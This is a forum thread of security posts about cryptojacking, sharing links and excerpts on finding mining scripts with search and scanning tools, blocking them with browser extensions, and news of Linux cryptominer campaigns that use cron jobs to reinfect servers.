Page 1 of 1
finding cryptojacking malware with PublicWWW
Posted: Sat 14 Apr 2018, 12:12
by labbe5
https://badpackets.net/how-to-find-cryp ... g-malware/
Cryptojacking malware continues to spread across the web, largely due to the popularity of Coinhive. Since Coinhive’s launch in September 2017, numerous cryptojacking clones have come about.
The tool I’ve chosen to locate them with is PublicWWW. This is a search engine that indexes the entire source code of websites.
Further reading :
https://badpackets.net/my-favorite-webs ... -services/
Cryptojacking detection was added to urlscan.io early in January 2018. This enables you check if a website is engaging in malicious cryptocurrency mining, based on known signatures of cryptojacking malware (JavaScript).
https://urlscan.io/
https://sitecheck.sucuri.net/
How to stop cryptojacking
Posted: Wed 27 Jun 2018, 19:19
by labbe5
https://badpackets.net/how-to-stop-cryptojacking/
Cryptojacking is defined as hijacking your desktop/ laptop computer, mobile device, or server to surreptitiously mine cryptocurrency for someone else’s profit. In other words, it’s the theft of computational resources (CPU) and energy (electricity).
Cryptojacking most commonly happens through a web browser. Malicious cryptomining scripts (sometimes referred to as coinminers) are frequently found being injected on compromised websites. Some affected sites have been of well-known organizations and government institutions. Many of the hacked sites found were using vulnerable content management systems or compromised third-party services.
Cryptojacking is typically resource intensive as malicious cryptocurrency mining consumes all CPU resources available. This is because the amount of CPU power used correlates to the speed at which hashes can be generated (mined). The faster hashes are mined, the faster money is made.
Cryptojacking can be stopped by using a browser extension designed to block malicious cryptocurrency mining scripts.
MinerBlock is an addon for Firefox and Chrome.
https://addons.mozilla.org/en-US/firefo ... ock-origin
Further reading :
https://www.guidingtech.com/block-crypt ... ng-firefox
Cryptominer Uses Cron To Reinfect Linux Host After Removal
Posted: Thu 20 Jun 2019, 21:19
by labbe5
https://www.bleepingcomputer.com/news/s ... r-removal/
A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed.
The malware was initially discovered on a web server with a maxed out CPU by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources.
As Sucuri's security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method — most probably after exploiting an unpatched vulnerability, brute forcing their way in, or by phishing the admin credentials.
Linux targeted with coin miners
The Linux platform is getting more and more attention from cybercriminals as Check Point proved with the discovery of a Backdoor Trojan they dubbed SpeakUp that targets servers running six different Linux distributions to drop XMRig miners.
Another campaign detected by Trend Micro during February deployed the XMR-Stak Cryptonight cryptocurrency miner on Linux machines, at the same time hunting down and killing other Linux malware and coin miners present on computers it compromised.
Also, the Xbash botnet spotted by Palo Alto Networks' Unit 42 in September 2018 comes with self-spreading capabilities and it targets both Linux and Windows servers, combining cryptomining and ransomware capabilities.